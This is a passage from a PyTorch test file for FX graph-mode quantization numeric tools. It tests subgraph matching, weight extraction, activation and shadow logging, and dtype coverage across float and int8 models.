base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_hardswish, F.hardswish)
results = get_matching_subgraph_pairs(
m1, m2,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops)
hardswish_name_0 = 'base_op_' + get_base_name_for_op(
base_name_to_sets_of_related_ops, F.hardswish) + '_0'
expected_types = {
hardswish_name_0:
((F.hardswish, torch.ao.quantization.MinMaxObserver), (_wrapped_hardswish, _wrapped_hardswish)),
}
self.assert_types_for_matched_subgraph_pairs(
results, expected_types, m1, m2)
@skipIfNoFBGEMM
def test_results_order(self):
m = nn.Sequential(
nn.Conv2d(1, 1, 1),
nn.Linear(1, 1),
).eval()
mp = prepare_fx(m, {'': torch.ao.quantization.default_qconfig})
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
self.assertTrue(len(results) == 2)
results_iter = iter(results.items())
_, (subgraph_a_0, subgraph_b_0) = next(results_iter)
self.assertTrue(subgraph_a_0.start_node.name == '_0' and
subgraph_b_0.start_node.name == '_0')
_, (subgraph_a_1, subgraph_b_1) = next(results_iter)
self.assertTrue(subgraph_a_1.start_node.name == '_1' and
subgraph_b_1.start_node.name == '_1')
class TestFXGraphMatcherModels(QuantizationTestCase):
@skipIfNoFBGEMM
@skip_if_no_torchvision
def test_mobilenet_v2(self):
# verify that mobilenetv2 graph is able to be matched
import torchvision
m = torchvision.models.__dict__['mobilenet_v2'](pretrained=False).eval().float()
mp = prepare_fx(copy.deepcopy(m), {'': torch.ao.quantization.default_qconfig})
# assume success if no exceptions
results_m_mp = get_matching_subgraph_pairs(torch.fx.symbolic_trace(m), mp)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results_mp_mq = get_matching_subgraph_pairs(mp, mq)
@skipIfNoFBGEMM
@skip_if_no_torchvision
def test_mobilenet_v2_qat(self):
# verify that mobilenetv2 graph is able to be matched
import torchvision
m = torchvision.models.__dict__['mobilenet_v2'](pretrained=False).float()
mp = prepare_qat_fx(
copy.deepcopy(m),
{'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')})
# assume success if no exceptions
results_m_mp = get_matching_subgraph_pairs(torch.fx.symbolic_trace(m), mp)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results_mp_mq = get_matching_subgraph_pairs(mp, mq)
class FXNumericSuiteQuantizationTestCase(QuantizationTestCase):
def _test_extract_weights(
self, m, results_len=0, qconfig_dict=None, prepare_fn=prepare_fx
):
m = torch.fx.symbolic_trace(m)
if qconfig_dict is None:
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fn(copy.deepcopy(m), qconfig_dict)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# test both the public API as well as the internal GraphModule API
for extract_weights_fun in (extract_weights, _extract_weights_impl):
# test both m vs mp and mp vs mq
for m1, m2 in ((m, mp), (mp, mq)):
results = extract_weights_fun('a', m1, 'b', m2)
self.assertTrue(
len(results) == results_len,
f"expected len {results_len}, got len {len(results)}")
self.assert_ns_compare_dict_valid(results)
extend_logger_results_with_comparison(
results, 'a', 'b', compute_sqnr, 'sqnr')
extend_logger_results_with_comparison(
results, 'a', 'b', compute_normalized_l2_error, 'l2_error')
extend_logger_results_with_comparison(
results, 'a', 'b', compute_cosine_similarity,
'cosine_similarity')
def _test_match_activations(
self, m, data, prepared_expected_node_occurrence=None, results_len=0,
should_log_inputs=False,
qconfig_dict=None,
skip_scripting=False,
prepare_fn=prepare_fx,
):
if qconfig_dict is None:
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
if prepare_fn == prepare_fx:
m.eval()
else:
m.train()
mp = prepare_fn(copy.deepcopy(m), qconfig_dict)
mp(*data)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
m_ns, mp_ns2 = add_loggers(
'a', m, 'b', copy.deepcopy(mp), OutputLogger,
should_log_inputs=should_log_inputs)
mp_ns, mq_ns = add_loggers(
'a', mp, 'b', mq, OutputLogger,
should_log_inputs=should_log_inputs)
if prepared_expected_node_occurrence:
self.checkGraphModuleNodes(
m_ns, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mp_ns2, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mp_ns, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mq_ns, expected_node_occurrence=prepared_expected_node_occurrence)
if not skip_scripting:
m_ns = torch.jit.script(m_ns)
mp_ns = torch.jit.script(mp_ns)
mq_ns = torch.jit.script(mq_ns)
# calibrate
m_ns(*data)
mp_ns2(*data)
mp_ns(*data)
mq_ns(*data)
# check activation result correctness
results = []
for m1, m2 in ((m_ns, mp_ns2), (mp_ns, mq_ns)):
act_compare_dict = extract_logger_info(
m1, m2, OutputLogger, 'b')
self.assertTrue(
len(act_compare_dict) == results_len,
f"expected len {results_len}, got len {len(act_compare_dict)}")
self.assert_ns_compare_dict_valid(act_compare_dict)
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_normalized_l2_error, 'l2_error')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_cosine_similarity,
'cosine_similarity')
results.append(act_compare_dict)
return results
def _test_match_shadow_activations(
self, m, data, prepared_expected_node_occurrence=None, results_len=None,
should_log_inputs=False, qconfig_dict=None, skip_scripting=False,
prepare_fn=prepare_fx, compare_fp32_vs_fp32_prepared=True,
):
if qconfig_dict is None:
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
if prepare_fn == prepare_fx:
m.eval()
else:
m.train()
mp = prepare_fn(copy.deepcopy(m), qconfig_dict)
mp(*data)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
if compare_fp32_vs_fp32_prepared:
m_shadows_mp = add_shadow_loggers(
'a', copy.deepcopy(m), 'b', copy.deepcopy(mp),
OutputLogger, should_log_inputs=should_log_inputs)
mp_shadows_mq = add_shadow_loggers(
'a', mp, 'b', mq, OutputLogger,
should_log_inputs=should_log_inputs)
if prepared_expected_node_occurrence:
if compare_fp32_vs_fp32_prepared:
self.checkGraphModuleNodes(
m_shadows_mp, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mp_shadows_mq, expected_node_occurrence=prepared_expected_node_occurrence)
if not skip_scripting:
if compare_fp32_vs_fp32_prepared:
m_shadows_mp = torch.jit.script(m_shadows_mp)
mp_shadows_mq = torch.jit.script(mp_shadows_mq)
# calibrate
if compare_fp32_vs_fp32_prepared:
m_shadows_mp(*data)
mp_shadows_mq(*data)
# check activation result correctness
results = []
models = (m_shadows_mp, mp_shadows_mq) if \
compare_fp32_vs_fp32_prepared else (mp_shadows_mq,)
for model in models:
act_compare_dict = extract_shadow_logger_info(
model, OutputLogger, 'b')
if results_len is not None:
self.assertTrue(
len(act_compare_dict) == results_len,
f"expected len {results_len}, got len {len(act_compare_dict)}")
self.assert_ns_compare_dict_valid(act_compare_dict)
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_normalized_l2_error, 'l2_error')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_cosine_similarity,
'cosine_similarity')
results.append(act_compare_dict)
return results
class TestFXNumericSuiteCoreAPIs(FXNumericSuiteQuantizationTestCase):
@skipIfNoFBGEMM
def test_extract_weights_mod_ptq(self):
m = AllConvAndLinearFusionModules().eval()
self._test_extract_weights(m, results_len=14)
@skipIfNoFBGEMM
def test_extract_weights_mod_qat(self):
m = AllConvAndLinearFusionModules().train()
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
self._test_extract_weights(
m, results_len=14, qconfig_dict=qconfig_dict, prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_extract_weights_linear_fun_ptq(self):
m = LinearReluLinearFunctional().eval()
self._test_extract_weights(m, results_len=2)
@skipIfNoFBGEMM
def test_extract_weights_linear_fun_qat(self):
m = LinearReluLinearFunctional().train()
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
self._test_extract_weights(
m, results_len=2, qconfig_dict=qconfig_dict, prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_extract_weights_conv_fun_ptq(self):
w1d = torch.randn(1, 1, 1)
w2d = torch.randn(1, 1, 1, 1)
w3d = torch.randn(1, 1, 1, 1, 1)
b1d = torch.randn(1)
b2d = torch.randn(1)
b3d = torch.randn(1)
m = AllConvFunctional(w1d, w2d, w3d, b1d, b2d, b3d).eval()
self._test_extract_weights(m, results_len=6)
@skipIfNoFBGEMM
def test_extract_weights_conv_fun_qat(self):
w1d = torch.randn(1, 1, 1)
w2d = torch.randn(1, 1, 1, 1)
w3d = torch.randn(1, 1, 1, 1, 1)
b1d = torch.randn(1)
b2d = torch.randn(1)
b3d = torch.randn(1)
m = AllConvFunctional(w1d, w2d, w3d, b1d, b2d, b3d).train()
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
self._test_extract_weights(
m, results_len=6, qconfig_dict=qconfig_dict, prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_extract_weights_dynamic(self):
# TODO(future PR): add Linear-ReLU, after #55393 is fixed.
m = nn.Sequential(nn.Linear(1, 1)).eval()
qconfig_dict = {
'object_type': [
(nn.Linear, default_dynamic_qconfig),
],
}
self._test_extract_weights(m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_extract_weights_fqn(self):
m = nn.Sequential(
nn.Sequential(nn.Conv2d(1, 1, 1)),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq = convert_fx(copy.deepcopy(mp))
results = extract_weights('a', mp, 'b', mq)
fqn_a_0 = results['_0_0']['weight']['a'][0]['fqn']
fqn_b_0 = results['_0_0']['weight']['b'][0]['fqn']
self.assertTrue(fqn_a_0 == '0.0' and fqn_a_0 == fqn_b_0)
fqn_a_1 = results['_1']['weight']['a'][0]['fqn']
fqn_b_1 = results['_1']['weight']['b'][0]['fqn']
self.assertTrue(fqn_a_1 == '1' and fqn_a_1 == fqn_b_1)
def _test_match_activations_mod_impl(self, prepare_fn=prepare_fx):
m = nn.Sequential(
torch.ao.quantization.QuantStub(),
nn.Conv2d(1, 1, 1),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
expected_occurrence = {
ns.call_module(OutputLogger): 2,
}
self._test_match_activations(
m, (torch.randn(2, 1, 2, 2),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=2, qconfig_dict=qconfig_dict, prepare_fn=prepare_fn)
@skipIfNoFBGEMM
def test_match_activations_mod_ptq(self):
self._test_match_activations_mod_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_match_activations_mod_qat(self):
self._test_match_activations_mod_impl(prepare_fn=prepare_qat_fx)
def _test_match_activations_fun_impl(self, prepare_fn=prepare_fx):
m = LinearReluLinearFunctional().eval()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
expected_occurrence = {
ns.call_module(OutputLogger): 2,
}
self._test_match_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=2, prepare_fn=prepare_fn, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_match_activations_fun_ptq(self):
self._test_match_activations_fun_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_match_activations_fun_qat(self):
self._test_match_activations_fun_impl(prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_match_activations_meth_ptq(self):
"""
Verify that add_loggers works on methods
"""
class M(nn.Module):
def forward(self, x):
x = x.sigmoid()
return x
m = M().eval()
res = self._test_match_activations(
m, (torch.randn(4, 4),),
results_len=1)
@skipIfNoFBGEMM
def test_match_activations_fqn(self):
m = nn.Sequential(
nn.Sequential(nn.Conv2d(1, 1, 1)),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq = convert_fx(copy.deepcopy(mp))
mp_ns, mq_ns = add_loggers('a', mp, 'b', mq, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
mp_ns(datum)
mq_ns(datum)
results = extract_logger_info(mp_ns, mq_ns, OutputLogger, 'b')
fqn_a_0 = results['_0_0']['node_output']['a'][0]['fqn']
fqn_b_0 = results['_0_0']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_0 == '0.0' and fqn_a_0 == fqn_b_0)
fqn_a_1 = results['_1']['node_output']['a'][0]['fqn']
fqn_b_1 = results['_1']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_1 == '1' and fqn_a_1 == fqn_b_1)
def _test_add_shadow_loggers_mod_impl(self, prepare_fn=prepare_fx):
m = nn.Sequential(
nn.Conv2d(1, 1, 1),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
res = self._test_match_shadow_activations(
m, (torch.randn(1, 1, 4, 4),), results_len=2,
prepare_fn=prepare_fn, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, enable after"
"dtype inference is supported")
def test_add_shadow_loggers_mod_ptq(self):
self._test_add_shadow_loggers_mod_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_add_shadow_loggers_mod_qat(self):
self._test_add_shadow_loggers_mod_impl(prepare_fn=prepare_qat_fx)
def _test_add_shadow_loggers_fun_impl(self, prepare_fn=prepare_fx):
m = LinearReluLinearFunctional()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
res = self._test_match_shadow_activations(
m, (torch.randn(4, 4),), results_len=2, prepare_fn=prepare_fn,
qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_add_shadow_loggers_fun_ptq(self):
self._test_add_shadow_loggers_fun_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_add_shadow_loggers_fun_qat(self):
self._test_add_shadow_loggers_fun_impl(prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, enable after"
"dtype inference is supported")
def test_add_shadow_loggers_meth_ptq(self):
"""
Verify that add_loggers works on methods
"""
class M(nn.Module):
def forward(self, x):
x = x.sigmoid()
return x
m = M().eval()
res = self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
results_len=1)
@skipIfNoFBGEMM
def test_add_shadow_loggers_multiple_dtype_casts(self):
"""
Verifies that for nodes where the first input arg is a list,
such as `cat`, we insert an individual dtype cast for each
arg of the list.
"""
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
x = torch.cat([x, x, x], dim=0)
return x
m = M().eval()
expected_occurrence = {
# 3 dequantize function calls from the 3 dtype casts for [x, x, x]
ns.call_module(torch.nn.Identity): 3,
# 1 dequantize method call for module output
ns.call_method("dequantize"): 1,
}
self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=1, compare_fp32_vs_fp32_prepared=False)
@skipIfNoFBGEMM
def test_shadow_activations_fqn(self):
m = nn.Sequential(
nn.Sequential(nn.Conv2d(1, 1, 1)),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq = convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers('a', mp, 'b', mq, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
mp_shadows_mq(datum)
results = extract_shadow_logger_info(mp_shadows_mq, OutputLogger, 'b')
fqn_a_0 = results['_0_0']['node_output']['a'][0]['fqn']
fqn_b_0 = results['_0_0']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_0 == '0.0' and fqn_a_0 == fqn_b_0)
fqn_a_1 = results['_1']['node_output']['a'][0]['fqn']
fqn_b_1 = results['_1']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_1 == '1' and fqn_a_1 == fqn_b_1)
@skipIfNoFBGEMM
def test_logging_inputs(self):
"""
Verifies that logging inputs works correctly
"""
class M(nn.Module):
def __init__(self):
super().__init__()
self.conv = nn.Conv2d(1, 1, 1)
def forward(self, x):
x = self.conv(x)
x = torch.cat([x, x], dim=0)
return x
m = M().eval()
self._test_match_shadow_activations(
m, (torch.randn(1, 1, 4, 4),),
results_len=2,
should_log_inputs=True)
@skipIfNoFBGEMM
def test_ops_with_same_fp32_and_int8_signature(self):
"""
Verifies that we can match pairs of ops which have the same aten
signature for fp32 and int8 tensors.
"""
class M(nn.Module):
def __init__(self):
super().__init__()
self.max_pool_2d = nn.MaxPool2d(2)
def forward(self, x):
x = self.max_pool_2d(x)
x = F.relu(x)
return x
m = M().eval()
self._test_match_activations(
m, (torch.randn(1, 1, 2, 2),),
results_len=2)
@skipIfNoFBGEMM
def test_add_mul_inputs_activations(self):
m = AddMulFunctional().eval()
res = self._test_match_activations(
m, (torch.randn(2, 2), torch.randn(2, 2)),
results_len=6, should_log_inputs=True)
@skipIfNoFBGEMM
def test_linear_fp16_weights(self):
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
m = LinearReluFunctional().eval()
self._test_extract_weights(m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_linear_fp16_activations(self):
for should_log_inputs in (True, False):
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
m = LinearReluFunctional().eval()
num_loggers = 2 if should_log_inputs else 1
expected_occurrence = {
ns.call_module(OutputLogger): num_loggers,
}
res = self._test_match_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=1,
qconfig_dict=qconfig_dict,
should_log_inputs=should_log_inputs)
@skipIfNoFBGEMM
def test_linear_fp16_shadow_activations(self):
for should_log_inputs in (True, False):
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
m = LinearReluFunctional().eval()
num_loggers = 4 if should_log_inputs else 2
expected_occurrence = {
ns.call_module(OutputLogger): num_loggers,
}
res2 = self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=1,
qconfig_dict=qconfig_dict,
should_log_inputs=should_log_inputs)
@skipIfNoFBGEMM
def test_linear_fp16_vs_linear_fp16_shadow_activations(self):
m = LinearFunctional().eval()
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq1 = convert_fx(copy.deepcopy(mp))
mq2 = convert_fx(copy.deepcopy(mp))
mq1_shadows_mq2 = _add_shadow_loggers_impl(
'a', mq1, 'b', mq2, OutputLogger, should_log_inputs=False)
mq1_shadows_mq2(torch.randn(4, 4))
act_compare_dict = extract_shadow_logger_info(
mq1_shadows_mq2, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 1)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
@unittest.skip("TODO: broken by https://github.com/pytorch/pytorch/pull/61687, will enable later")
def test_op_with_either_fp32_or_int8_input(self):
"""
Verify that shadowing works with ops which accept either fp32 or
int8 inputs.
"""
class M(nn.Module):
def __init__(self):
super().__init__()
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(x)
x = F.relu(x)
return x
m = M()
res = self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
results_len=2)
def _test_int8_shadows_int8_impl(self, m):
"""
Verify that shadowing works where both modules are int8
"""
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mp(torch.randn(4, 1, 4, 4))
mq1 = convert_fx(copy.deepcopy(mp))
mq2 = convert_fx(mp)
mq1_shadows_mq2 = add_shadow_loggers('a', mq1, 'b', mq2, OutputLogger)
mq1_shadows_mq2(torch.randn(4, 1, 4, 4))
act_compare_dict = extract_shadow_logger_info(
mq1_shadows_mq2, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 1)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
def test_int8_shadows_int8_mod(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
self._test_int8_shadows_int8_impl(m)
@skipIfNoFBGEMM
def test_int8_shadows_int8_fun(self):
m = LinearFunctional().eval()
self._test_int8_shadows_int8_impl(m)
@skipIfNoFBGEMM
def test_user_module_scriptable(self):
# Logging of the output of this class is not supported, because it is
        # neither a tensor nor an RNN return type.
class M1(nn.Module):
def forward(self, x):
x1 = x * 2
x2 = x * 4
return (x1, x2)
class M2(nn.Module):
def __init__(self):
super().__init__()
self.m1 = M1()
def forward(self, x):
x1, x2 = self.m1(x)
return x1, x2
m = M2().eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
prepare_custom_config_dict = {
'non_traceable_module_class': [M1],
}
mp1 = prepare_fx(m, qconfig_dict, prepare_custom_config_dict)
mp2 = copy.deepcopy(mp1)
unmatchable_types_map = get_unmatchable_types_map()
unmatchable_types_map['mods_unmatchable'].add(M1)
mp1_ns, mp2_ns = _add_loggers_impl(
'a', mp1, 'b', mp2, OutputLogger, should_log_inputs=False,
unmatchable_types_map=unmatchable_types_map)
# Scripting a model with loggers should succeed. If it fails because of
# incorrect dtypes, we can blocklist the associated types from being instrumented.
mp1_ns_scripted = torch.jit.script(mp1_ns)
mp2_ns_scripted = torch.jit.script(mp2_ns)
@skipIfNoFBGEMM
def test_user_module(self):
"""
For user defined modules,
1. weight extraction should not crash
2. unshadowed activations should only have loggers for known types
3. shadowed activations should only have loggers for known types with
known dtypes
"""
class UserModule(nn.Module):
def forward(self, x):
return x
class M(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(1, 1)
self.user_module = UserModule()
def forward(self, x):
x = self.linear(x)
x = self.user_module(x)
return x
m = M().eval()
# quantize without tracing through UserModule
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
prepare_custom_config_dict = {'non_traceable_module_name': ['user_module']}
mp = prepare_fx(m, qconfig_dict, prepare_custom_config_dict)
mp(torch.randn(1, 1, 1))
mq = convert_fx(copy.deepcopy(mp))
# weight extraction should not crash
weights = _extract_weights_impl('fp32_prepared', mp, 'int8', mq)
# unshadowed activations should have loggers
# add loggers, without retracing
# note: converting again because we cannot copy a quantized linear
mp_ns, mq_ns = _add_loggers_impl(
'fp32_prepared', copy.deepcopy(mp), 'int8',
convert_fx(copy.deepcopy(mp)), OutputLogger,
should_log_inputs=True)
# both fp32 and int8 models should have 2 loggers each, 2 for I/O
# of linear, and 0 for I/O of user_module
unshadowed_expected_occurrence = {
ns.call_module(OutputLogger): 2,
}
self.checkGraphModuleNodes(
mp_ns, expected_node_occurrence=unshadowed_expected_occurrence)
self.checkGraphModuleNodes(
mq_ns, expected_node_occurrence=unshadowed_expected_occurrence)
# shadowed activations should only have loggers for nodes where
# the types are known and we can do a dtype cast
# add shadow loggers, without retracing
mp_shadows_mq_ns = _add_shadow_loggers_impl(
'fp32_prepared', mp, 'int8', mq, OutputLogger,
should_log_inputs=True)
# 4 loggers for I/O of linear, 0 loggers for I/O of user_module
shadowed_expected_occurrence = {
ns.call_module(OutputLogger): 4,
}
self.checkGraphModuleNodes(
mp_shadows_mq_ns, expected_node_occurrence=shadowed_expected_occurrence)
def test_op_io_dtype_coverage(self):
"""
Tests that all the ops quantization cares about have input and output
dtypes defined.
"""
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
type_a_related_to_b = \
get_type_a_related_to_b(base_name_to_sets_of_related_ops)
# TODO(future PR): clean this up
node_type_to_io_type_map = get_node_type_to_io_type_map()
FUNS_IO_TYPE_FP32 = node_type_to_io_type_map['funs_io_type_fp32']
FUNS_IO_TYPE_INT8 = node_type_to_io_type_map['funs_io_type_int8']
FUNS_IO_TYPE_FP32_OR_INT8 = node_type_to_io_type_map['funs_io_type_fp32_or_int8']
MODS_IO_TYPE_FP32 = node_type_to_io_type_map['mods_io_type_fp32']
MODS_IO_TYPE_INT8 = node_type_to_io_type_map['mods_io_type_int8']
MODS_IO_TYPE_FP32_OR_INT8 = node_type_to_io_type_map['mods_io_type_fp32_or_int8']
METHS_IO_TYPE_FP32_OR_INT8 = node_type_to_io_type_map['meths_io_type_fp32_or_int8']
unmatchable_types_map = get_unmatchable_types_map()
FUNS_UNMATCHABLE = unmatchable_types_map['funs_unmatchable']
MODS_UNMATCHABLE = unmatchable_types_map['mods_unmatchable']
METHS_UNMATCHABLE = unmatchable_types_map['meths_unmatchable']
# 1. check static quant module mappings
static_quant_mod_mappings = get_default_static_quant_module_mappings()
for fp32_type, int8_type in static_quant_mod_mappings.items():
types_to_skip = (
torch.ao.quantization.QuantStub,
torch.ao.quantization.DeQuantStub,
nnq.FloatFunctional,
# TODO(future PR): look into whether shadowing embeddings
# makes sense
nn.Embedding,
nn.EmbeddingBag,
)
if fp32_type in types_to_skip:
continue
self.assertTrue(
fp32_type in MODS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type}")
self.assertTrue(
int8_type in MODS_IO_TYPE_INT8,
f"missing IO type handling for f{int8_type}")
# 2. check static quant op mappings
static_quant_fun_mappings = get_default_float_to_quantized_operator_mappings()
for fp32_type, int8_type in static_quant_fun_mappings.items():
self.assertTrue(
fp32_type in FUNS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type}")
self.assertTrue(
int8_type in FUNS_IO_TYPE_INT8,
f"missing IO type handling for f{int8_type}")
# 3. check dynamic quant mappings
dynamic_quant_mappings = get_default_dynamic_quant_module_mappings()
for fp32_type1, fp32_type2 in dynamic_quant_mappings.items():
# TODO(future PR): verify correct I/O for these and remove from
# this list.
types_to_skip = (
nn.GRUCell,
nn.GRU,
nn.LSTMCell,
nn.RNNCell,
# TODO(future PR): look into whether shadowing embeddings
# makes sense
nn.Embedding,
nn.EmbeddingBag,
)
if fp32_type1 in types_to_skip:
continue
self.assertTrue(
fp32_type1 in MODS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type1}")
self.assertTrue(
fp32_type2 in MODS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type2}")
# 4. go through the ops mapped to each QuantizeHandler type, and verify
# correctness.
default_quant_patterns = get_default_quant_patterns()
for pattern, qhandler_cls in default_quant_patterns.items():
base_op = None
if isinstance(pattern, tuple):
base_op = pattern[-1]
elif isinstance(pattern, str):
base_op = pattern
else:
base_op = pattern
if (
qhandler_cls in (
qp.BinaryOpQuantizeHandler,
qp.RNNDynamicQuantizeHandler,
)
):
# TODO(future PR): implement shadowing for binary ops
# TODO(future PR): implement shadowing for RNN ops
continue
elif qhandler_cls == qp.CatQuantizeHandler:
self.assertTrue(
base_op in FUNS_IO_TYPE_FP32_OR_INT8,
f"missing IO type handling for {base_op}")
elif (
qhandler_cls in (
qp.ConvReluQuantizeHandler,
qp.LinearReLUQuantizeHandler,
qp.BatchNormQuantizeHandler,
qp.DefaultNodeQuantizeHandler,
)
):
self.assertTrue(
(base_op in FUNS_IO_TYPE_FP32) or (base_op in MODS_IO_TYPE_FP32),
f"missing IO type handling for {base_op}")
elif (
qhandler_cls in (
qp.FixedQParamsOpQuantizeHandler,
qp.CopyNodeQuantizeHandler,
qp.GeneralTensorShapeOpQuantizeHandler,
)
):
if (
base_op in FUNS_UNMATCHABLE or
base_op in MODS_UNMATCHABLE or
base_op in METHS_UNMATCHABLE
):
continue
self.assertTrue(
(base_op in FUNS_IO_TYPE_FP32_OR_INT8) or
(base_op in MODS_IO_TYPE_FP32_OR_INT8) or
(base_op in METHS_IO_TYPE_FP32_OR_INT8),
f"missing IO type handling for {base_op}")
elif qhandler_cls == qp.EmbeddingQuantizeHandler:
# embedding shadowing is not implemented, for now
continue
else:
raise AssertionError(
f"handing for {qhandler_cls} not implemented")
@skipIfNoFBGEMM
def test_user_defined_function(self):
"""
Verify that NS APIs work on user defined functions
"""
class M1(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(1, 1))
self.b1 = nn.Parameter(torch.zeros(1))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = F.hardswish(x)
x = x.sigmoid()
x = F.linear(x, self.w1, self.b1)
return x
class M2(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(1, 1))
self.b1 = nn.Parameter(torch.zeros(1))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = _wrapped_hardswish(x)
x = _wrapped_sigmoid(x)
x = _wrapped_linear(x, self.w1, self.b1)
return x
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
m1 = prepare_fx(M1().eval(), qconfig_dict)
m2 = prepare_fx(M2().eval(), qconfig_dict)
data = torch.randn(1, 1)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_hardswish, F.hardswish)
add_op_to_sets_of_related_ops(
